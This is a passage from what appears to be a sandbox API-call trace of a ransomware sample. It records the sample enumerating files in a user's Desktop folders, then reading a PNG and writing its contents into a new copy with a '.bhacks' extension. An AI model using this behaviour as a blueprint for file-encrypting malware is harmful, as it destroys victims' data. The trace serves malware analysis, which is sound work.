cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0064.724] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0064.724] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0064.724] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0064.724] FindClose (in: hFindFile=0x9be840 | out: hFindFile=0x9be840) returned 1 [0064.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.png", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf2c0 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0064.725] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0064.725] FindClose (in: hFindFile=0x9bf2c0 | out: hFindFile=0x9bf2c0) returned 1 [0064.726] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.png", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.726] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf2c0 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0064.726] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0064.726] FindClose (in: hFindFile=0x9bf2c0 | out: hFindFile=0x9bf2c0) returned 1 [0064.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.png", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 0x9bf440 [0064.727] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0064.727] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0064.727] FindClose (in: hFindFile=0x9bf440 | out: hFindFile=0x9bf440) returned 1 [0064.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0064.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0064.727] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png.bhacks", lpFilePart=0x0) returned 0x47 [0064.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\dn0hvzxxceh-nyaf_h.png.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0064.727] GetFileType (hFile=0x324) returned 0x1 [0064.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.728] GetFileType (hFile=0x324) returned 0x1 [0064.738] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png", lpFilePart=0x0) returned 0x40 [0064.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\dn0hvzxxceh-nyaf_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0064.739] GetFileType (hFile=0x33c) returned 0x1 [0064.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.739] GetFileType (hFile=0x33c) returned 0x1 [0064.739] ReadFile (in: hFile=0x33c, lpBuffer=0x267bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x267bad8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.739] ReadFile (in: hFile=0x33c, lpBuffer=0x267bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x267bad8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.739] WriteFile (in: hFile=0x324, lpBuffer=0x267ccf0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x267ccf0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.747] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.747] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.747] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.748] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.748] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.748] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.748] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.749] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.749] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.749] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.749] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.749] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.750] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.750] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.750] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.750] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.751] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.751] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.751] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.751] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24aff98*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.751] ReadFile (in: hFile=0x33c, lpBuffer=0x24aef68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aef68*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.752] WriteFile (in: hFile=0x324, lpBuffer=0x24aff98*, nNumberOfBytesToWrite=0x1000, 